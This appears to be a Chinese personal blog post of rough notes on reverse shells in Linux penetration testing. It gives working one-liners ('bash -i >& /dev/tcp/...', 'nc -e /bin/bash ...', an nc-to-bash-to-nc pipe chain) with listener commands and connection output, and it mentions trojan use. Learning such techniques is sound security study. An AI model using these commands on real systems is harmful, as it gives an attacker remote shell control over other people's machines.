标题:Linux渗透之反弹Shell 出处:向东博客 专注WEB应用 构架之美 --- 构架之美,在于尽态极妍 | 应用之美,在于药到病除 时间:Sat, 24 Jun 2017 12:41:01 +0000 作者:jackxiang 地址:http://jackxiang.com/post/9254/ 内容: ls /proc/8145/fd #0,1给定和到socket里面了 https://help.aliyun.com/document_detail/206139.htm xiangdong@kali-linux-bj-yz-10-10-0-136:~$ nc -lvvp 6767 [root@levoo-gateway_virtualrouter-ipforward_bj_rfls_10_10_0_3:/tmp] bash -i >& /dev/tcp/10.10.0.136/6767 0>&1 来自:https://blog.csdn.net/weixin_50464560/article/details/123886779 反弹shell通常适用于如下几种情况: 目标机因防火墙受限,目标机器只能发送请求,不能接收请求。 目标机端口被占用。 目标机位于局域网,或IP会动态变化,攻击机无法直接连接。 对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知的。 ...... 对于以上几种情况,我们是无法利用正向连接的,要用反向连接。 背景:反弹是目标机主动连接攻击机,是指在控制的机器上开一个端口,在另一端被入侵的服务器上面开一个连接到公网服务器的IP和端口。 如,被控机上运行(相当于在一台生产服务器上面访问一个websocket不断开): nc -e /bin/bash 10.10.0.136 4444 在控制机上面开端口,并能反过来控制那台发起连接的服务器,靠的是它上面的bash解析器: nc -lp 4444 ls anaconda-ks.cfg pwd /root ls anaconda-ks.cfg cd /home/ ls 10.10.0.1** #/home目录 按顺序开三个SecureCRT终端,在一里面输入echo "hello jackX",会在二里面显示hello jackX: 一、 nc -l -p 1234 -vv echo "hello jackX" 二、 nc -l -p 4321 -vv hello jackX 三、 nc 10.44.202.177 1234|/bin/bash|nc 10.44.202.177 4321 nc 123.57.252.183 1234|/bin/bash|nc 123.57.252.183 4321 这时我们就可以在1234端口输入命令,在4321端口查看命令的输出了。 管道“|”可以将上一个命令的输出作为下一个命令的输入。所以上面命令的意思就是将10.42.0.1:1234传过来的命令交给/bin/bash执行,再将执行结果传给10.44.202.177:4321显示。 nc -l -p 4321 -vv nc -l -p 4321 -vv Ncat: Version 6.40 ( http://nmap.org/ncat ) Ncat: Listening on :::4321 Ncat: Listening on 0.0.0.0:4321 Ncat: Connection from 10.44.202.177. Ncat: Connection from 10.44.202.177:59294. nc -l -p 1234 -vv Ncat: Version 6.40 ( http://nmap.org/ncat ) Ncat: Listening on :::1234 Ncat: Listening on 0.0.0.0:1234 Ncat: Connection from 10.44.202.177. Ncat: Connection from 10.44.202.177:51650. nc 10.44.202.177 1234|/bin/bash|nc 10.44.202.177 4321 触发上面两个。 摘自实践自:【【安全客】Linux渗透之反弹Shell】http://m.toutiao.com/group/6398009141268365570/?iid=7737129548&app=news_article&tt_from=copy_link&utm_source=copy_link&utm_medium=toutiao_ios&utm_campaign=client_share Generated by Jackxiang's Bo-blog 2.1.1 Release